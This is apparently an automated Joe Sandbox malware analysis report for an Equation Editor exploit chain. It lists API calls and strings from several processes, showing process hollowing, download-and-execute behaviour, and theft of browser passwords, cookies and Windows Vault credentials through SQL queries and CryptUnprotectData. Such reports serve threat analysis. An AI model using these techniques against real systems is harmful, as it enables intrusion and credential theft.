Instruction ID: 78a7b1b2ef3c6f4724c54bcc1305931a591a80ab39332fd61898bbda23e93571
Opcode Fuzzy Hash: 59fb6a7732f5aea67854b90e5282ebabce3ba5b56b1c4f5de79b72ce498ffebc
Instruction Fuzzy Hash: 2BE04F34508A09CFEB28ABA4C0DCBB132A1EB18306F2401BEED0ED9295CB769945C721

Uniqueness

Uniqueness Score: -1.00%

Function 02933D64 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02933D80
SleepEx.KERNEL32 ref: 02933D8B

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: 59fb6a7732f5aea67854b90e5282ebabce3ba5b56b1c4f5de79b72ce498ffebc
Instruction ID: f39c694f8aa8f5dd414001cdd293bb75105a5b92108937f0bb5ad90019ee2fe1
Opcode Fuzzy Hash: 59fb6a7732f5aea67854b90e5282ebabce3ba5b56b1c4f5de79b72ce498ffebc
Instruction Fuzzy Hash: 65E08630508A09CFFF28AFA4C0DCBB132A5EB18306F1401BADC1EDD295CB764945C765

Uniqueness

Uniqueness Score: -1.00%

Function 02933FEC Relevance: 1.9, APIs: 1, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c647ebbd2d0d3ee215d98efe499d98e101b592db1954d2b684e1bc1fc74afe8
Instruction ID: 20274ebc35069178a589ad64dd46abb727758e76d9c175619d817801c3aed3e8
Opcode Fuzzy Hash: 2c647ebbd2d0d3ee215d98efe499d98e101b592db1954d2b684e1bc1fc74afe8
Instruction Fuzzy Hash: 39D18030718F098FDB65EF68D8456AEB7E6FB98701F51452DE44AD3241DF74E8028B82

Uniqueness

Uniqueness Score: -1.00%

Function 02934BC0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 02934C2D

Part of subcall function 029350A4: CryptAcquireContextA.ADVAPI32 ref: 029350D9

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: AcquireContextCryptInformationVolume
String ID:
API String ID: 4059528372-0
Opcode ID: bd55c488720b18bc72921ffc2c29ac3348fc394a1343250cc1b936983dc9290f
Instruction ID: 04612f3817e3b1445480e48ce2948ff777722cdf03cc626163032c5e9ff29cde
Opcode Fuzzy Hash: bd55c488720b18bc72921ffc2c29ac3348fc394a1343250cc1b936983dc9290f
Instruction Fuzzy Hash: D0315530618A4C8FDB64EF68D8486AA77E2FBEC311F11466E984EC7264DE30D9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 028C1950 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 028C19A0: RtlCreateHeap.NTDLL ref: 028C1AB7

SleepEx.KERNEL32(?,?,?,?,?,?,?,028C1943), ref: 028C1970

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: ca012a7a8a9901c459fa6c3a329600c805df2b46c4c34968e5359a47117b4807
Instruction ID: 1dc4bd45ee67a8b07804538f23c913e55b8108ec98522d8d9e1f6a3df2e479f1
Opcode Fuzzy Hash: ca012a7a8a9901c459fa6c3a329600c805df2b46c4c34968e5359a47117b4807
Instruction Fuzzy Hash: 6FE0121C714B080BEB5CBB7984CC32C5496DB89285FB4057EA90EC6697DF34C8488722

Uniqueness

Uniqueness Score: -1.00%

Function 02931950 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 029319A0: RtlCreateHeap.NTDLL ref: 02931AB7

SleepEx.KERNEL32(?,?,?,?,?,?,?,02931943), ref: 02931970

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: ca012a7a8a9901c459fa6c3a329600c805df2b46c4c34968e5359a47117b4807
Instruction ID: 212f1390b37f81f1800409737a7be9f052875babb77fad427fdefc16a08786e5
Opcode Fuzzy Hash: ca012a7a8a9901c459fa6c3a329600c805df2b46c4c34968e5359a47117b4807
Instruction Fuzzy Hash: 2FE01210714B080BDB5A7B74D58432C5496DFC9394F54097D991EC61B1DE24CC448722

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 028C281C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d4a1162f86e6ed21e3376b54b256d1c43a504eaafed10283e6c14e2f7cc0f5
Instruction ID: bfaa9a70e690b7840b359977957738b3d2c11683b529229d86b7cb932f5f4092
Opcode Fuzzy Hash: 08d4a1162f86e6ed21e3376b54b256d1c43a504eaafed10283e6c14e2f7cc0f5
Instruction Fuzzy Hash: 31D19738718F088FDB68EF6C949826E72D2FB98715F60452ED44ED3295DF34E8468B81

Uniqueness

Uniqueness Score: -1.00%

Function 0293281C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36095514ba3399726748b438577fa76e2ef0367348ca22519055fbff4ee9081b
Instruction ID: 9f24be75f94146a13a626404ee232b59a5f71476487a4bf3180751bf7b5954fd
Opcode Fuzzy Hash: 36095514ba3399726748b438577fa76e2ef0367348ca22519055fbff4ee9081b
Instruction Fuzzy Hash: C0D18230B18F088FDB69EF68848826A73E2FB9C701F51456ED84EC3255DF34E8468B85

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rirjijjPID: 3712, Parent PID: 2056COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	77
Total number of Limit Nodes:	7

Executed Functions

Function 00312C34 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 00313045
e, xrefs: 00312FD4
\Microsoft.NET\Framework\, xrefs: 00312FDB
egas, xrefs: 00312FC6
m.ex, xrefs: 00312FCD

Memory Dump Source

Source File: 0000000F.00000002.1134151145.0000000000310000.00000040.00001000.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_310000_rirjijj.jbxd

Similarity

API ID:
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 0-1087957892
Opcode ID: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction ID: d73d3019223404b434a8e64025ba1536e4d46fc88b23ff7d75af903bcb5fcb66
Opcode Fuzzy Hash: 7dedae8e35398986174414f77deba81bdc27b61a9c1b597510ad186c0c01245d
Instruction Fuzzy Hash: 7EE128B1D00259AFDF16AFE5CC81AEEBBB8FF08304F14846AE514AB241D7709A95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00312CA6 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 369
nativeprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00312E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00312EBF
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0031306A
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 003130AF
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 003130D9
NtUnmapViewOfSection.NTDLL(?,?), ref: 003130F4
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0031310D
NtResumeThread.NTDLL(?,00000000), ref: 0031314B

Strings

D, xrefs: 00313045
e, xrefs: 00312FD4
\Microsoft.NET\Framework\, xrefs: 00312FDB
egas, xrefs: 00312FC6
m.ex, xrefs: 00312FCD

Memory Dump Source

Source File: 0000000F.00000002.1134151145.0000000000310000.00000040.00001000.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_310000_rirjijj.jbxd

Similarity

API ID: Section$View$CreateMemoryVirtual$ProcessReadResumeThreadUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 615172284-1087957892
Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction ID: f4fff15cbcdcc180f446c355709216942be4050279e3deb6bd6d59c2ac9e6290
Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction Fuzzy Hash: 08E107B1D00259AFDF16EFE5CC81AEEBBB8BF08314F14846AE515AB201D7709A91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0031231B Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 356
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00312E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00312EBF

Strings

D, xrefs: 00313045
e, xrefs: 00312FD4
\Microsoft.NET\Framework\, xrefs: 00312FDB
egas, xrefs: 00312FC6
m.ex, xrefs: 00312FCD

Memory Dump Source

Source File: 0000000F.00000002.1134151145.0000000000310000.00000040.00001000.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_310000_rirjijj.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction ID: 8f7e86a0f13d866cc065a96c6b0223252dceb2def058e24c8871141e331c5e4a
Opcode Fuzzy Hash: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction Fuzzy Hash: 9BD116B1D00259AFDF16AFE5CC81AEEBBB8BF08314F14846AE514AB201D7709A91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00312CA3 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 354
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00312E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00312EBF

Strings

D, xrefs: 00313045
e, xrefs: 00312FD4
\Microsoft.NET\Framework\, xrefs: 00312FDB
egas, xrefs: 00312FC6
m.ex, xrefs: 00312FCD

Memory Dump Source

Source File: 0000000F.00000002.1134151145.0000000000310000.00000040.00001000.00020000.00000000.sdmp, Offset: 00310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_310000_rirjijj.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction ID: 5639634187b46607466b48a0c59b6631623e5180529e766c9f2450fc71549a36
Opcode Fuzzy Hash: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction Fuzzy Hash: 72D106B1D00259AFDF16EFE5CC81AEEBBB8BF08304F14846AE515AB201D7709A95CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: EQNEDT32.EXEPID: 4012, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	26.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	125
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 037003EA Relevance: 6.1, APIs: 4, Instructions: 83
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(037003DC), ref: 037003EA

Part of subcall function 03700404: URLDownloadToFileW.URLMON(00000000,03700415,?,00000000,00000000), ref: 03700457
Part of subcall function 03700404: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03700495
Part of subcall function 03700404: ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 38c720feadbf5dad5981aba921efced7a42a9a910c39a4b6eccaf9e7f4503d3e
Instruction ID: e170da67b408245f2349771da8bf15616e0180f6b82901169530a4ededfc51d6
Opcode Fuzzy Hash: 38c720feadbf5dad5981aba921efced7a42a9a910c39a4b6eccaf9e7f4503d3e
Instruction Fuzzy Hash: 7A21AF9694C3C1AFDB13D7704C6EB69BFA46F53224F5989CEE0C2094D3E6985101C35B

Uniqueness

Uniqueness Score: -1.00%

Function 0370035E Relevance: 4.6, APIs: 3, Instructions: 138
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03700415,?,00000000,00000000), ref: 03700457
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03700495
ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 180c6720955fa0275c0eec24ed2006c3c0bbcacbc4d58ea7b480e37a6d9e944b
Instruction ID: 64a4b21479638dea19ead983689d5f1b8a0d41e86c31b29ca49cce725255122e
Opcode Fuzzy Hash: 180c6720955fa0275c0eec24ed2006c3c0bbcacbc4d58ea7b480e37a6d9e944b
Instruction Fuzzy Hash: E141AB9584C3C0AFD713D7704D6D759BFA47B23220F5C86CEA082490E3E6989505C35A

Uniqueness

Uniqueness Score: -1.00%

Function 0370037A Relevance: 4.6, APIs: 3, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03700415,?,00000000,00000000), ref: 03700457
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03700495
ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: d1562c64dea2ccc76f3bfddcc8f16ec22b5a81086f41fbf542f31fbc367e9b60
Instruction ID: ca7bf73d91b50817105c1411dcbf8a20a51f154d01c2406f8e7ec32784e509e4
Opcode Fuzzy Hash: d1562c64dea2ccc76f3bfddcc8f16ec22b5a81086f41fbf542f31fbc367e9b60
Instruction Fuzzy Hash: EF417A9584D3C1AFD713E7704D6EB59BFA4BF13620F498ACEA0C2490E3E6989105C35B

Uniqueness

Uniqueness Score: -1.00%

Function 03700404 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 98a7fbeb34c725494517927c3bfd6f471cd564496dbbf98808849b0c7ba56a06
Instruction ID: 18e3df071cb5560b61328630cde5bdde12d65aa079cf5e3141828e42d4865f87
Opcode Fuzzy Hash: 98a7fbeb34c725494517927c3bfd6f471cd564496dbbf98808849b0c7ba56a06
Instruction Fuzzy Hash: 1221899694C3C1AEDB13D7704C6DB69BFA46F63220F5989CEA0C24A4D3E6A88000C31B

Uniqueness

Uniqueness Score: -1.00%

Function 03700455 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03700415,?,00000000,00000000), ref: 03700457

Part of subcall function 0370046E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03700495
Part of subcall function 0370046E: ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 07cc607ff6fd1e94c16f52aaa576454a02f797f3dbe1a9dc8390b874d58ec97d
Instruction ID: 345c97a57bd097b23b19ce7b8c5ce4a989581e1fe5cc325dfae0ccbec40e1afd
Opcode Fuzzy Hash: 07cc607ff6fd1e94c16f52aaa576454a02f797f3dbe1a9dc8390b874d58ec97d
Instruction Fuzzy Hash: F0F0279468C344E9EA52E7B44C4EFAE6ED4AF93B24F144889B1814D0D3E8C08400C32E

Uniqueness

Uniqueness Score: -1.00%

Function 03700483 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03700495

Part of subcall function 037004A8: ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 277b4faa77a5244ebe150ab485e583c4e87fcdf0fa49a90daeb303257dfec89c
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 510149D4A84346E1DB70E6F88805FFAABD1EB53730FCC8846B581441C6E49481C3D62D

Uniqueness

Uniqueness Score: -1.00%

Function 0370046E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 06ae39da83878116c64f3374cc61cb9a0bfbcad835969adbd94f613998411d03
Instruction ID: afc273c274e8af820e0ca8ba3916217f50cbc21a7ed822e96a4965ac99383c39
Opcode Fuzzy Hash: 06ae39da83878116c64f3374cc61cb9a0bfbcad835969adbd94f613998411d03
Instruction Fuzzy Hash: 9A017DA0588305F4E770E2B48C88FEDAAC5EB83734F98845AF091480C3D6848543D22D

Uniqueness

Uniqueness Score: -1.00%

Function 037004A8 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 037004AD

Memory Dump Source

Source File: 00000010.00000002.1130135860.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Offset: 03700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_3700000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3872, Parent PID: 1860COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	57.8%
Signature Coverage:	17.8%
Total number of Nodes:	567
Total number of Limit Nodes:	32

Executed Functions

Function 000C3533 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 396
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
Part of subcall function 000C1D32: CloseHandle.KERNEL32(00000000), ref: 000C1D57

GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3594
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C359E
DeleteFileW.KERNELBASE(00000000), ref: 000C35A5
CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C35B0
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 000C3649
RtlZeroMemory.NTDLL(?,00000040), ref: 000C367E
lstrlen.KERNEL32(?,?,?,?,?), ref: 000C3799
lstrlen.KERNEL32(00000000), ref: 000C37A8
wsprintfA.USER32 ref: 000C37FF
lstrlen.KERNEL32(00000000,?,?), ref: 000C380B
lstrcat.KERNEL32(00000000,?), ref: 000C382F
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3857
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000C3921
lstrlen.KERNEL32(00000000), ref: 000C3930
wsprintfA.USER32 ref: 000C3987
lstrlen.KERNEL32(00000000), ref: 000C3993
lstrcat.KERNEL32(00000000,?), ref: 000C39B7
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C39E8
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C3A24

Strings

0, xrefs: 000C3636
v1, xrefs: 000C362F
TRUE, xrefs: 000C37D7, 000C395F
COOKIES, xrefs: 000C39F6, 000C39FB, 000C3A04
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 000C35D1
%sTRUE%s%s%s%s%s, xrefs: 000C37F9, 000C3981
FALSE, xrefs: 000C37CA, 000C394A

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: 22e0b72aa5a9af9ab50a9a01751e1d7e609b576d93687654f9954b46683f5bcf
Instruction ID: ac58aad3be71041c0e971e5867e046018e98a19d0f2b584399e813f2db5ed433
Opcode Fuzzy Hash: 22e0b72aa5a9af9ab50a9a01751e1d7e609b576d93687654f9954b46683f5bcf
Instruction Fuzzy Hash: A8E19A70608341AFD765DF24C884FAFBBE9AF85744F04882CF985872A2DB75CA45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C2308 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 000C231F
GetVersionExW.KERNEL32(?), ref: 000C232E
LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000C2358
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 000C237A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 000C2384
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 000C2390
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 000C239A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 000C23A6
RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C2458
RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C24DC

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000C256E
FreeLibrary.KERNELBASE(00000000), ref: 000C2603

Strings

Internet Explorer, xrefs: 000C2568
VaultEnumerateItems, xrefs: 000C2386
VaultGetItem, xrefs: 000C2392
vaultcli.dll, xrefs: 000C2353
VaultFree, xrefs: 000C239C
VaultCloseVault, xrefs: 000C237C
VaultOpenVault, xrefs: 000C2374

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: 95a05e4c378957748b554eb77fab816bc97d68ed3de4a3d4286ed02933be5cc0
Instruction ID: 7ddd2073a2014e9e6b20870118511289795e9bb2b075dfc113844f3f004dc6b4
Opcode Fuzzy Hash: 95a05e4c378957748b554eb77fab816bc97d68ed3de4a3d4286ed02933be5cc0
Instruction Fuzzy Hash: 97916671A08300AFD758EF65C895EAFBBE9AF89304F00482DF58597262EB71DC41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C3208 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000C1D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
Part of subcall function 000C1D32: CloseHandle.KERNEL32(00000000), ref: 000C1D57

GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3269
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3273
DeleteFileW.KERNELBASE(00000000), ref: 000C327A
CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3285
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000C3314
RtlZeroMemory.NTDLL(?,00000040), ref: 000C3347
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C344F
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C350C

Strings

v1, xrefs: 000C32FA
0, xrefs: 000C3301
@, xrefs: 000C3361
SELECT origin_url,username_value,password_value FROM logins, xrefs: 000C32A6

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
